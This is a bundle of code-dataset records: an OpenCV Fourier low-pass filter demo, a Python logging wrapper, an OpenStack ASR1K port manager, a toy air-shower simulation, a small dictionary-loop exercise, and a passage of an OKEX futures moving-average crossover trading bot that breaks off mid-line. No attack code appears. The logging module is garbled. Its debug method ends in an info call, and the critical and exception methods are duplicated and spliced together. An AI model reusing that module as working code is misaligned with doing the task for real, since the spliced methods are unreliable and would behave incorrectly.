analogon: \", len(analogon.metabolites))\n","sub_path":"autopacmen/compare_gecko_and_gecko_analogon.py","file_name":"compare_gecko_and_gecko_analogon.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"277769367","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n# le imagem quad\nimg = cv2.imread('quad.bmp', 0)\ndft = cv2.dft(np.float32(img), flags=cv2.DFT_COMPLEX_OUTPUT)\ndft_shift = np.fft.fftshift(dft)\n\nmagnitude_spectrum = 20 * np.log(cv2.magnitude(dft_shift[:, :, 0], dft_shift[:, :, 1]))\nrows, cols = img.shape\ncrow, ccol = int(rows / 2), int(cols / 2)\nmask = np.zeros((rows, cols, 2), np.uint8)\nnum = 10\nmask[crow - num:crow + num, ccol - num:ccol + num] = 1\nfshift = dft_shift * mask\nf_ishift = np.fft.ifftshift(fshift)\nimg_back = cv2.idft(f_ishift)\nimg_back = cv2.magnitude(img_back[:, :, 0], img_back[:, :, 1])\nplt.subplot(121), plt.imshow(img, cmap='gray')\nplt.title('Input Image'), plt.xticks([]), plt.yticks([])\nplt.subplot(122), plt.imshow(img_back, cmap='gray')\nplt.title('Magnitude Spectrum'), plt.xticks([]), plt.yticks([])\n\nplt.plot(img_back[50])\n\n\nplt.show()\n","sub_path":"lab_2/ex_4.py","file_name":"ex_4.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"582979404","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nThe code is mostly the result of Frédéric Mantegazza with only slight\nmodifications to allow for my logging structure\n\nModule purpose\n--------------------------------------------\n\nLogging\n\nImplements\n--------------------------------------------\n - DefaultFormatter\n - ColorFormatter\n - Logger\n\n:author: Frédéric Mantegazza and Colin Kennedy\n.. @copyright: (C) 2007-2011 Frédéric Mantegazza\n.. 
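Aside on the quad.bmp snippet above: it builds a centered square low-pass mask on the shifted spectrum with cv2.dft. The same experiment can be run with numpy's FFT alone, which makes the mask half-width easy to vary (a sketch, not part of the original script):

import numpy as np

def lowpass(img, half_width=10):
    # shift the spectrum so low frequencies sit at the center, mask, then invert
    f = np.fft.fftshift(np.fft.fft2(img))
    mask = np.zeros_like(f)
    crow, ccol = img.shape[0] // 2, img.shape[1] // 2
    mask[crow - half_width:crow + half_width, ccol - half_width:ccol + half_width] = 1
    return np.abs(np.fft.ifft2(np.fft.ifftshift(f * mask)))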
@license: CeCILL\n\"\"\"\n\n__revision__ = \"$Id$\"\n\n# IMPORT STANDARD LIBRARIES\nimport logging\nimport logging.handlers\nimport StringIO\nimport traceback\nimport os.path\n\n# IMPORT THIRD PARTY LIBRARIES\nfrom commons.unseenformatter import UnseenFormatter\nfrom logger.common import config\nfrom logger.common.loggingFormatter import DefaultFormatter, ColorFormatter, \\\n                                           SpaceFormatter, SpaceColorFormatter\nfrom pysix import six  # Python 2.x/3.x string types checking\n\nlogger = None\n\n# IMPORT LOCAL LIBRARIES\nfrom dictlogger import LoggerDictBase, \\\n                       LOGGER_MESSAGE_CONFIG, \\\n                       RE_LOGGER_KEY_MATCH\n\nclass LoggerObject(LoggerDictBase):\n    \"\"\"\n    Logger object that is instantiated by the factory method\n    \"\"\"\n    def __init__(self, defaultStreamHandler, defaultFileHandler):\n        \"\"\"\n        Initialize the object\n\n        Args:\n            defaultStreamHandler (bool): If enabled, the logger will print\n                                         to stdout\n            defaultFileHandler (bool): If enabled, a rotating file handler\n                                       will be created in the directory given\n                                       by config.TMP_DIR\n        \"\"\"\n        super(LoggerDictBase, self).__init__()  # takes no arguments\n        super(LoggerObject, self).__init__(defaultStreamHandler, defaultFileHandler)\n        logging.TRACE = logging.DEBUG - 5\n        logging.EXCEPTION = logging.ERROR + 5\n        logging.raiseExceptions = 0\n        logging.addLevelName(logging.TRACE, \"TRACE\")\n        logging.addLevelName(logging.EXCEPTION, \"EXCEPTION\")\n\n        # Formatters\n\n        #defaultFormatter = DefaultFormatter(config.LOGGER_FORMAT)\n        spaceFormatter = SpaceFormatter(config.LOGGER_FORMAT)\n        #colorFormatter = ColorFormatter(config.LOGGER_FORMAT)\n        spaceColorFormatter = SpaceColorFormatter(config.LOGGER_FORMAT)\n\n        # Logger\n        self.__logger = logging.getLogger('POP2')\n        self.__logger.setLevel(logging.TRACE)\n\n        # Handlers\n        if defaultStreamHandler:\n            stdoutStreamHandler = logging.StreamHandler()\n            #stdoutStreamHandler.setFormatter(colorFormatter)\n            stdoutStreamHandler.setFormatter(spaceColorFormatter)\n            self.__logger.addHandler(stdoutStreamHandler)\n        if defaultFileHandler:\n            loggerFilename = os.path.join(config.TMP_DIR, config.LOGGER_FILENAME)\n            fileHandler = logging.handlers.RotatingFileHandler(loggerFilename, 'w',\n                                                               config.LOGGER_MAX_BYTES,\n                                                               config.LOGGER_BACKUP_COUNT)\n            fileHandler.setFormatter(spaceFormatter)\n            self.__logger.addHandler(fileHandler)\n\n    def addStreamHandler(self, stream, formatter=DefaultFormatter):\n        \"\"\"\n        Add a new stream handler.\n        Can be used to register a new GUI handler.\n\n        Args:\n            stream (file-like): open stream where to write logs\n            formatter (L{DefaultFormatter}): Associated\n                                             formatter\n        \"\"\"\n        handler = logging.StreamHandler(stream)\n        handler.setFormatter(formatter(config.LOGGER_FORMAT))\n        self.__logger.addHandler(handler)\n    # end addStreamHandler\n\n    def get_value(self, key, args, kwds):\n        \"\"\"\n        Look up ``key`` in ``kwds`` and return the matching item. This logger\n        expects string keys; a non-string key is handed off to a formatter\n        that can deal with it safely.\n\n        Args:\n            key (str or other): The key to get the item of\n            args (other): Additional arguments to pass to\n                          string.Formatter.get_value\n                          (see its documentation for more details)\n            kwds (dict): The dictionary to retrieve items from, using key\n\n        Returns:\n            (str or any): The item(s) from kwds. It will typically be a\n                          string but could theoretically be anything\n        \"\"\"\n        if isinstance(key, str):\n            try:\n                return kwds[key]\n            except KeyError:\n                return key\n        else:\n            # delegate non-string keys to the formatter used throughout this module\n            return UnseenFormatter().get_value(key, args, kwds)\n    # end get_value\n\n    def setLevel(self, level):\n        \"\"\"\n        Change logging level.\n\n        Args:\n            level (str): new level, in ('trace', 'debug', 'info', 'warning',\n                         'error', 'exception', 'critical')\n        \"\"\"\n        loggerLevels = ('trace', 'debug', 'info', 'warning', 'error', 'exception', 'critical')\n        if level not in loggerLevels:\n            raise ValueError(\"Logger level must be in %s\" % loggerLevels)\n        levels = {'trace': logging.TRACE,\n                  'debug': logging.DEBUG,\n                  'info': logging.INFO,\n                  'warning': logging.WARNING,\n                  'error': logging.ERROR,\n                  'exception': logging.EXCEPTION,\n                  'critical': logging.CRITICAL}\n        self.__logger.setLevel(levels[level])\n    # end setLevel\n\n    def trace(self, pos, format=None, *args, **kwargs):\n        \"\"\"\n        Logs a message with level TRACE.\n\n        Args:\n            pos (str): Either a string to use to send a message to the\n                       StreamHandler or a key that's used to access a\n                       dictionary, passed through format\n            format (dict): An optional dictionary which can contain strings as\n                           \"key\"/\"item\" pairs, which would be used to replace\n                           formatted text that's passed from self.__getitem__\n            args (any): Any additional variables to pass to the logger instance\n            kwargs (any): Any additional keywords to pass to the logger instance\n        \"\"\"\n        if format is None:\n            message = self.__getitem__(pos)\n        else:\n            message = self.__getitem__(pos)\n            message = str(message)\n            fmt = UnseenFormatter()\n            message = fmt.format(message, **format)\n\n        if isinstance(pos, six.string_types):\n            # override previous if pos is a regular logging string\n            message = pos\n\n        self.__logger.log(logging.TRACE, message, *args, **kwargs)\n\n    def debug(self, pos, format=None, *args, **kwargs):\n        \"\"\"\n        Logs a message with level DEBUG.\n\n        Args:\n            pos (str): Either a string to use to send a message to the\n                       StreamHandler or a key that's used to access a\n                       dictionary, passed through format\n            format (dict): An optional dictionary which can contain strings as\n                           \"key\"/\"item\" pairs, which would be used to replace\n                           formatted text that's passed from self.__getitem__\n            args (any): Any additional variables to pass to the logger instance\n            kwargs (any): Any additional keywords to pass to the logger instance\n        \"\"\"\n        if format is None:\n            message = self.__getitem__(pos)\n        else:\n            message = self.__getitem__(pos)\n            message = str(message)\n            fmt = UnseenFormatter()\n            message = fmt.format(message, **format)\n\n        if 
isinstance(pos, six.string_types):\n # override previous if pos is a regular logging string\n message = pos\n\n self.__logger.info(message, *args, **kwargs)\n # end info\n\n def warning(self, pos, format=None, *args, **kwargs):\n \"\"\"\n Logs a message with level WARNING.\n\n Args:\n pos (str): Either a string to use to send a message to the\n StreamHandler or a key that's used to access a\n dictionary, passed through format\n format (dict): An optional dictionary which can contain strings as\n \"key\"/\"item\" pairs, which would be used to replace\n formatted text that's passed from self.__getitem__\n args (any): Any additional variables to pass to the logger instance\n kwargs (any): Any additional keywords to pass to the logger instance\n \"\"\"\n if format is None:\n message = self.__getitem__(pos)\n else:\n message = self.__getitem__(pos)\n message = str(message)\n fmt = UnseenFormatter()\n message = fmt.format(message, **format)\n\n if isinstance(pos, six.string_types):\n # override previous if pos is a regular logging string\n message = pos\n\n self.__logger.warning(message, *args, **kwargs)\n # end warning\n\n def error(self, pos, format=None, *args, **kwargs):\n \"\"\"\n Logs a message with level ERROR.\n\n Args:\n pos (str): Either a string to use to send a message to the\n StreamHandler or a key that's used to access a\n dictionary, passed through format\n format (dict): An optional dictionary which can contain strings as\n \"key\"/\"item\" pairs, which would be used to replace\n formatted text that's passed from self.__getitem__\n args (any): Any additional variables to pass to the logger instance\n kwargs (any): Any additional keywords to pass to the logger instance\n \"\"\"\n if format is None:\n message = self.__getitem__(pos)\n else:\n message = self.__getitem__(pos)\n message = str(message)\n fmt = UnseenFormatter()\n message = fmt.format(message, **format)\n\n if isinstance(pos, six.string_types):\n # override previous if pos is a regular logging string\n message = pos\n\n self.__logger.error(message, *args, **kwargs)\n # end error\n\n def critical(self, pos, format=None, *args, **kwargs):\n \"\"\"\n Logs a message with level CRITICAL.\n\n Args:\n pos (str): Either a string to use to send a message to the\n StreamHandler or a key that's used to access a\n dictionary, passed through format\n format (dict): An optional dictionary which can contain strings as\n \"key\"/\"item\" pairs, which would be used to replace\n formatted text that's passed from self.__getitem__\n args (any): Any additional variables to pass to the logger instance\n kwargs (any): Any additional keywords to pass to the logger instance\n \"\"\"\n if format is None:\n message = self.__getitem__(pos)\n else:\n message = self.__getitem__(pos)\n message = str(message)\n fmt = UnseenFormatter()\n message = fmt.format(message, **format)\n\n if isinstance(pos, six.string_types):\n # override previous if pos is a regular logging string\n message = pos\n\n self.__logger.critical(message, *args, **kwargs)\n # end critical\n\n def exception(self, pos, debug=False, format=None, *args, **kwargs):\n \"\"\"\n Logs a message within an exception.\n\n Args:\n pos (str): Either a string to use to send a message to the\n StreamHandler or a key that's used to access a\n dictionary, passed through format\n debug (bool): Flag to log exception on DEBUG level instead of EXCEPTION one\n format (dict): An optional dictionary which can contain strings as\n \"key\"/\"item\" pairs, which would be used to replace\n formatted text 
that's passed from self.__getitem__\n            args (any): Any additional variables to pass to the logger instance\n            kwargs (any): Any additional keywords to pass to the logger instance\n        \"\"\"\n        if format is None:\n            message = self.__getitem__(pos)\n        else:\n            message = self.__getitem__(pos)\n            message = str(message)\n            fmt = UnseenFormatter()\n            message = fmt.format(message, **format)\n\n        if isinstance(pos, six.string_types):\n            # override previous if pos is a regular logging string\n            message = pos\n\n        self.__logger.critical(message, *args, **kwargs)\n    # end critical\n\n    def exception(self, pos, debug=False, format=None, *args, **kwargs):\n        \"\"\"\n        Logs a message within an exception.\n\n        Args:\n            pos (str): Either a string to use to send a message to the\n                       StreamHandler or a key that's used to access a\n                       dictionary, passed through format\n            debug (bool): Flag to log exception on DEBUG level instead of EXCEPTION one\n            format (dict): An optional dictionary which can contain strings as\n                           \"key\"/\"item\" pairs, which would be used to replace\n                           formatted text that's passed from self.__getitem__\n            args (any): Any additional variables to pass to the logger instance\n            kwargs (any): Any additional keywords to pass to the logger instance\n        \"\"\"\n        kwargs['exc_info'] = True\n        if format is None:\n            message = self.__getitem__(pos)\n        else:\n            message = str(self.__getitem__(pos))\n            fmt = UnseenFormatter()\n            message = fmt.format(message, **format)\n\n        if debug:\n            if isinstance(pos, six.string_types):\n                message = pos\n\n            self.debug(message, *args, **kwargs)\n        else:\n            if isinstance(pos, six.string_types):\n                message = pos\n\n            self.log(logging.EXCEPTION, message, *args, **kwargs)\n\n    def log(self, level, pos, format=None, *args, **kwargs):\n        \"\"\"\n        Logs a message with given level.\n\n        Args:\n            level (int): log level to use\n            pos (str): Either a string to use to send a message to the\n                       StreamHandler or a key that's used to access a\n                       dictionary, passed through format\n            format (dict): An optional dictionary of \"key\"/\"item\" pairs used to\n                           fill the message template\n            args (any): Any additional variables to pass to the logger instance\n            kwargs (any): Any additional keywords to pass to the logger instance\n        \"\"\"\n        if format is None:\n            message = self.__getitem__(pos)\n        else:\n            message = str(self.__getitem__(pos))\n            fmt = UnseenFormatter()\n            message = fmt.format(message, **format)\n\n        if isinstance(pos, six.string_types):\n            # override previous if pos is a regular logging string\n            message = pos\n\n        self.__logger.log(level, message, *args, **kwargs)\n    # end log\n\n    def getTraceback(self):\n        \"\"\"\n        Return the complete traceback. Should be called in an except statement.\n\n        Returns:\n            str: The traceback from within the exception block\n        \"\"\"\n        tracebackString = StringIO.StringIO()\n        traceback.print_exc(file=tracebackString)\n        message = tracebackString.getvalue().strip()\n        tracebackString.close()\n        return message\n    # end getTraceback\n\n    def shutdown(self):\n        \"\"\"\n        Shut down the logging service.\n        \"\"\"\n        logging.shutdown()\n    # end shutdown\n\n# Logger factory\ndef Logger(defaultStreamHandler=True, defaultFileHandler=True):\n    \"\"\"\n    The logger factory that creates a global logger and ensures that only one\n    instance of the logger class exists at a time\n\n    Args:\n        defaultStreamHandler (bool): When enabled, sets the StreamHandler to\n                                     stdout\n        defaultFileHandler (bool): When enabled, sets local files to save in\n                                   config.TMP_DIR\n\n    Returns:\n        : A global logger instance\n    \"\"\"\n    global logger\n    if logger is None:\n        logger = LoggerObject(defaultStreamHandler, defaultFileHandler)\n\n    return logger\n# end Logger\n\n\ndef init_logger():\n    \"\"\"\n    Initialize a basic logger\n    \"\"\"\n    logger = Logger(RE_LOGGER_KEY_MATCH, LOGGER_MESSAGE_CONFIG)\n    return logger\n# end init_logger\n\n\ndef test_logger():\n    \"\"\"\n    quick test\n    \"\"\"\n    dictNew = LoggerDictBase(RE_LOGGER_KEY_MATCH, LOGGER_MESSAGE_CONFIG)\n\n    logger = Logger(RE_LOGGER_KEY_MATCH, LOGGER_MESSAGE_CONFIG)\n    # logger.debug(['AIE3000', \"Match_True\"], {'name':'Joe'})\n    logger.debug(['AIE5605', \"Match_True\"], {'name':'Joe'})\n# end test_logger\n\nif __name__ == \"__main__\":\n    test_logger()\n","sub_path":"Pipeline/the_LATEST/sys_PY/py_MODULES/logger/common/loggingServices.py","file_name":"loggingServices.py","file_ext":"py","file_size_in_byte":17012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"258826763","text":"# Copyright 2017 SAP SE\n#\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. 
You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom oslo_log import log as logging\nfrom oslo_utils import timeutils\nfrom asr1k_neutron_l3.models import asr1k_pair\nfrom asr1k_neutron_l3.models.netconf_yang import l2_interface\nfrom asr1k_neutron_l3.models.netconf_yang import efp_stats\nfrom asr1k_neutron_l3.common import utils\nfrom asr1k_neutron_l3.common.prometheus_monitor import PrometheusMonitor\n\nLOG = logging.getLogger(__name__)\n\n\ndef create_ports(ports, callback=None):\n LOG.debug(\"Starting a batch create of {} ports\".format(len(ports)))\n succeeded_ports = []\n failed_ports = []\n for port in ports:\n with PrometheusMonitor().port_create_duration.time():\n l2_port = Port(port)\n port_id = port.get('id')\n result = l2_port.create()\n if result:\n succeeded_ports.append(port_id)\n else:\n failed_ports.append(port_id)\n\n\n\n if callable(callback):\n callback(succeeded_ports, failed_ports)\n LOG.debug(\"Batch create of completed {}/{} ports successfully created\".format(len(succeeded_ports),len(ports)))\n return succeeded_ports\n\ndef update_ports(ports, callback=None):\n LOG.debug(\"Starting a batch update of {} ports\".format(len(ports)))\n succeeded_ports = []\n failed_ports = []\n\n for port in ports:\n with PrometheusMonitor().port_update_duration.time():\n port_id = port.get('id')\n\n l2_port = Port(port)\n result = l2_port.update()\n if result:\n succeeded_ports.append(port_id)\n else:\n failed_ports.append(port_id)\n\n\n if callable(callback):\n callback(succeeded_ports, failed_ports)\n LOG.debug(\"Batch update of completed {}/{} ports successfully updated\".format(len(succeeded_ports),len(ports)))\n return succeeded_ports\n\n\ndef delete_ports(port_extra_atts, callback=None):\n LOG.debug(\"Starting a batch delete of {} ports\".format(len(port_extra_atts)))\n succeeded_ports = []\n\n for port in port_extra_atts:\n with PrometheusMonitor().port_delete_duration.time():\n l2_port = Port(port)\n result = l2_port.delete()\n succeeded_ports.append(l2_port.id)\n\n\n\n if callable(callback):\n\n callback(succeeded_ports, [])\n LOG.debug(\"Batch delete of completed {}/{} ports successfully deleted\".format(len(succeeded_ports),len(port_extra_atts)))\n return succeeded_ports\n\n\nclass Port(object):\n\n def __init__(self, port_info):\n self.port_info = port_info\n self.config = asr1k_pair.ASR1KPair().config\n\n self.id = self.port_info.get('port_id')\n\n self.second_dot1q = self.port_info.get('second_dot1q')\n\n self.service_instance = utils.to_bridge_domain(self.second_dot1q)\n self.bridge_domain = utils.to_bridge_domain(self.second_dot1q)\n\n self.segmentation_id = self.port_info.get('segmentation_id')\n self.network_id = self.port_info.get('network_id')\n self.external_deleteable = self.port_info.get('external_deleteable')\n\n\n def _rest_definition(self):\n ext_interface = l2_interface.ExternalInterface(id=self.segmentation_id, description=\"Network : {}\".format(self.network_id),way=1,mode=\"symmetric\")\n lb_ext_interface = l2_interface.LoopbackExternalInterface(id=self.service_instance, description=\"Port : {}\".format(self.id),\n dot1q=self.segmentation_id, 
second_dot1q=self.second_dot1q,way=2,mode=\"symmetric\")\n lb_int_interface = l2_interface.LoopbackInternalInterface(id=self.service_instance, description=\"Port : {}\".format(self.id),\n bridge_domain=self.bridge_domain,\n dot1q=self.segmentation_id, second_dot1q=self.second_dot1q,way=2,mode=\"symmetric\")\n return ext_interface, lb_ext_interface, lb_int_interface\n\n def diff(self):\n ext_interface, lb_ext_interface, lb_int_interface = self._rest_definition()\n\n result = {}\n\n ext_diff = ext_interface.diff()\n if not ext_diff.valid:\n result[\"l2_external\"] = ext_diff.to_dict()\n\n lb_ext_diff = lb_ext_interface.diff()\n if not lb_ext_diff.valid:\n result[\"l2_external_lb\"] = lb_ext_diff.to_dict()\n\n lb_int_diff = lb_int_interface.diff()\n if not lb_int_diff.valid:\n result[\"l2_internal_lb\"] = lb_int_diff.to_dict()\n\n\n\n return result\n\n def get(self):\n\n ext_interface = l2_interface.ExternalInterface.get(self.segmentation_id)\n lb_ext_interface = l2_interface.LoopbackExternalInterface.get(self.service_instance)\n lb_int_interface = l2_interface.LoopbackInternalInterface.get(self.service_instance)\n\n\n return ext_interface,lb_ext_interface,lb_int_interface\n\n\n def get_stats(self):\n\n lb_ext_interface = efp_stats.LoopbackExternalEfpStats.get(id=self.service_instance)\n lb_int_interface = efp_stats.LoopbackInternalEfpStats.get(id=self.service_instance)\n\n return {\"external_lb\":lb_ext_interface.to_dict(),\"internal_lb\":lb_int_interface.to_dict()}\n\n\n def update(self,callback=None):\n failure = []\n success = [self.id]\n ext_interface, lb_ext_interface, lb_int_interface = self._rest_definition()\n\n result = ext_interface.update()\n\n if not result.success:\n failure.append(self.id)\n success = []\n\n result = lb_ext_interface.update()\n\n if not result.success:\n failure.append(self.id)\n success=[]\n\n result = lb_int_interface.update()\n\n if not result.success:\n failure.append(self.id)\n success = []\n\n\n if callable(callback):\n callback(success, failure)\n\n LOG.debug(\"Port {} update {}\".format(self.id,\"successfull\" if len(success) == 1 else \"failed\"))\n\n return len(success) == 1\n\n def create(self,callback=None):\n\n return self.update(callback)\n\n\n def delete(self, callback=None):\n\n ext_interface, lb_ext_interface, lb_int_interface = self._rest_definition()\n\n failure = []\n success = [self.id]\n\n # TODO only on last port on network\n if self.external_deleteable:\n result = ext_interface.delete()\n if not result.success:\n failure.append(self.id)\n success = []\n # For every port deletion\n result = lb_ext_interface.delete()\n if not result.success:\n failure.append(self.id)\n success = []\n result = lb_int_interface.delete()\n if not result.success:\n failure.append(self.id)\n success = []\n\n # TODO handle success/failure\n if callable(callback):\n callback([self.id], [])\n\n return len(success) == 1\n\n\n\n","sub_path":"asr1k_neutron_l3/models/neutron/l2/port.py","file_name":"port.py","file_ext":"py","file_size_in_byte":7493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"481815919","text":"\"\"\"\nToy Model imaging a shower on an array of Cerenkov Telescopes and making a small Hillas reconstruction\nCopyright (C) 2016 Thomas Vuillaume\n\nThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\n\nThis 
program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program.  If not, see <http://www.gnu.org/licenses/>.\n\nThe author may be contacted @\nthomas.vuillaume@lapp.in2p3.fr\n\"\"\"\n\n\nimport sympy\nimport numpy as np\nfrom math import *\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\n\n\ndef linear_segment(shower_top, shower_bot, n):\n    \"\"\"\n    linear segment with a homogeneous distribution of points\n    input: start and end points, number of points\n    output: array of points\n    \"\"\"\n    vec = np.array(shower_top)-np.array(shower_bot)\n    l = np.linspace(0,1,n)\n    x = []\n    for i in l:\n        x.append(np.array(shower_top) - vec * i)\n    return x\n\n\ndef random_surface_sphere(shower_center, shower_radius, n):\n    \"\"\"\n    cross representing the shower\n    input: point-arrays, int\n    output: array of point-arrays\n    \"\"\"\n    shower = []\n    theta,phi = pi * np.random.random_sample(n), 2. * pi * np.random.random_sample(n)\n    x = shower_center[0] + shower_radius * np.sin(theta) * np.cos(phi)\n    y = shower_center[1] + shower_radius * np.sin(theta) * np.sin(phi)\n    z = shower_center[2] + shower_radius * np.cos(theta)\n    for i in np.arange(n):\n        shower.append([x[i],y[i],z[i]])\n    return shower\n\ndef random_surface_ellipsoide(shower_center, shower_length, shower_width, n):\n    shower = []\n    theta,phi = pi * np.random.random_sample(n), 2. * pi * np.random.random_sample(n)\n    x = shower_center[0] + shower_width * np.sin(theta) * np.cos(phi)\n    y = shower_center[1] + shower_width * np.sin(theta) * np.sin(phi)\n    z = shower_center[2] + shower_length * np.cos(theta)\n    for i in np.arange(n):\n        shower.append([x[i],y[i],z[i]])\n    return shower\n\ndef random_ellipsoide(shower_center, shower_length, shower_width, n):\n    shower = []\n    theta,phi = pi * np.random.random_sample(n), 2. * pi * np.random.random_sample(n)\n    q,p = shower_length * np.random.random_sample(n), shower_width * np.random.random_sample(n)\n    x = shower_center[0] + p * np.sin(theta) * np.cos(phi)\n    y = shower_center[1] + p * np.sin(theta) * np.sin(phi)\n    z = shower_center[2] + q * np.cos(theta)\n    for i in np.arange(n):\n        shower.append([x[i],y[i],z[i]])\n    return shower\n\ndef plot3d(shower):\n    X = []\n    Y = []\n    Z = []\n    for points in shower:\n        X.append(points[0])\n        Y.append(points[1])\n        Z.append(points[2])\n\n    fig = plt.figure()\n    ax = fig.add_subplot(111, projection='3d')\n    ax.scatter(X, Y, Z)\n    plt.show()\n","sub_path":"tests/shower.py","file_name":"shower.py","file_ext":"py","file_size_in_byte":3124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"580025785","text":"users = {\n    \"simone\" : \"active\",\n    \"ciccio\" : \"inactive\",\n    \"pippo\" : \"active\"\n}\n\nactive_users = {}\ninactive_users = {}\n\nfor user,status in users.items():\n    if status == \"inactive\":\n        inactive_users[user] = status\n    else:\n        active_users[user] = status\n\nprint(active_users)\nprint(inactive_users)\n","sub_path":"Flow_control_tools/for_statement.py","file_name":"for_statement.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"102800384","text":"\"\"\"\nDouble moving average strategy\nThis strategy targets OKEX coin-margined futures.\nFor other contract types or for spot trading, adapt it yourself.\nAuthor: Gary-Hertel\nDate: 2020/09/02\nemail: interstella.ranger2020@gmail.com\n\"\"\"\n\nfrom purequant.indicators import INDICATORS\nfrom purequant.trade import OKEXFUTURES\nfrom purequant.position import POSITION\nfrom purequant.market import MARKET\nfrom purequant.logger import logger\nfrom purequant.push import push\nfrom purequant.storage import storage\nfrom purequant.time import *\nfrom purequant.config import config\n\nclass Strategy:\n\n    def __init__(self, instrument_id, time_frame, fast_length, slow_length, long_stop, short_stop, start_asset):\n        config.loads('config.json')  # load the config file\n        self.instrument_id = instrument_id  # contract ID\n        self.time_frame = time_frame  # candlestick timeframe\n        self.exchange = OKEXFUTURES(config.access_key, config.secret_key, config.passphrase, self.instrument_id)  # initialize the exchange\n        self.position = POSITION(self.exchange, self.instrument_id, self.time_frame)  # initialize position\n        self.market = MARKET(self.exchange, self.instrument_id, self.time_frame)  # initialize market\n        self.indicators = INDICATORS(self.exchange, self.instrument_id, self.time_frame)  # initialize indicators\n        # on the first run, save the initial capital to the database\n        self.database = \"回测\"  # must be \"回测\" (\"backtest\") when backtesting\n        self.datasheet = self.instrument_id.split(\"-\")[0].lower() + \"_\" + time_frame\n        if config.first_run:\n            storage.mysql_save_strategy_run_info(self.database, self.datasheet, get_localtime(),\n                                                 \"none\", 0, 0, 0, 0, \"none\", 0, 0, 0, start_asset)\n        # read the total capital stored in the database (the \"总资金\", i.e. total-capital, column)\n        self.total_asset = storage.read_mysql_datas(0, self.database, self.datasheet, \"总资金\", \">\")[-1][-1]\n        self.total_profit = storage.read_mysql_datas(0, self.database, self.datasheet, \"总资金\", \">\")[-1][-2]  # total strategy profit and loss\n        self.counter = 0  # counter\n        self.fast_length = fast_length  # fast moving-average length\n        self.slow_length = slow_length  # slow moving-average length\n        self.long_stop = long_stop  # long stop-loss ratio\n        self.short_stop = short_stop  # short stop-loss ratio\n        self.contract_value = self.market.contract_value()  # contract face value; each fetch is a network request, so cache it here for performance\n        print(\"{} {} double-MA long/short strategy started!\".format(get_localtime(), instrument_id))  # print a notice at startup\n\n
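Before the trading logic below, the signal test is worth isolating. A self-contained sketch of the golden-cross/death-cross check that begin_trade applies to the two completed bars (plain lists, no purequant required):

def crossover_signals(fast_ma, slow_ma):
    # indexes -2 and -3 are completed bars; the live bar (-1) is ignored on purpose
    cross_over = fast_ma[-2] >= slow_ma[-2] and fast_ma[-3] < slow_ma[-3]
    cross_below = slow_ma[-2] >= fast_ma[-2] and slow_ma[-3] < fast_ma[-3]
    return cross_over, cross_below

# golden cross: the fast MA was below on bar -3 and at/above on bar -2
assert crossover_signals([1, 2, 4, 0], [3, 3, 3, 0]) == (True, False)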
    def begin_trade(self, kline=None):\n        try:\n            if self.indicators.CurrentBar(kline=kline) < self.slow_length:  # return if there is not enough candle history yet\n                return\n            timestamp = ts_to_datetime_str(utctime_str_to_ts(kline[-1][0])) if kline else get_localtime()  # outside backtesting the timestamp is simply the current local time\n            # compute the strategy signals\n            ma = self.indicators.MA(self.fast_length, self.slow_length, kline=kline)\n            fast_ma = ma[0]\n            slow_ma = ma[1]\n            cross_over = fast_ma[-2] >= slow_ma[-2] and fast_ma[-3] < slow_ma[-3]  # use completed bars, not the live bar, so the signal cannot flicker\n            cross_below = slow_ma[-2] >= fast_ma[-2] and slow_ma[-3] < fast_ma[-3]\n            if self.indicators.BarUpdate(kline=kline):  # reset the counter when a new bar opens\n                self.counter = 0\n            if self.counter < 1:\n                # open/close positions according to the signals\n                if cross_over:  # on a golden cross\n                    if self.position.amount() == 0:  # if flat, buy to open a long and push the order result\n                        price = self.market.open(-1, kline=kline)  # order price = this candle's close\n                        amount = round(self.total_asset / self.contract_value)  # size = total capital / contract face value\n                        info = self.exchange.buy(price, amount)\n                        push(info)\n                        storage.mysql_save_strategy_run_info(self.database, self.datasheet, timestamp, \"买入开多\",\n                                                             price, amount, amount * self.contract_value, price,\n                                                             \"long\", amount, 0, self.total_profit, self.total_asset)  # save the record to the database\n                    if self.position.direction() == 'short':  # if currently short, close the short first, then open a long\n                        profit = self.position.covershort_profit(market_type=\"usd_contract\", last=self.market.open(-1, kline=kline))  # compute the paper P&L before closing the short; the latest traded price is taken to be the open price\n                        self.total_profit += profit\n                        self.total_asset += profit  # total capital after this trade's P&L\n                        cover_short_price = self.market.open(-1, kline=kline)\n                        cover_short_amount = self.position.amount()\n                        open_long_price = self.market.open(-1, kline=kline)\n                        open_long_amount = round(self.total_asset / self.contract_value)\n                        info = self.exchange.BUY(cover_short_price, cover_short_amount, open_long_price, open_long_amount)\n                        push(\"P&L this trade: {}  total capital now: {}\".format(profit, self.total_asset) + str(info))  # the returned order info must be cast to str before concatenation\n                        storage.mysql_save_strategy_run_info(self.database, self.datasheet, timestamp, \"平空开多\",\n                                                             open_long_price, open_long_amount, open_long_amount * 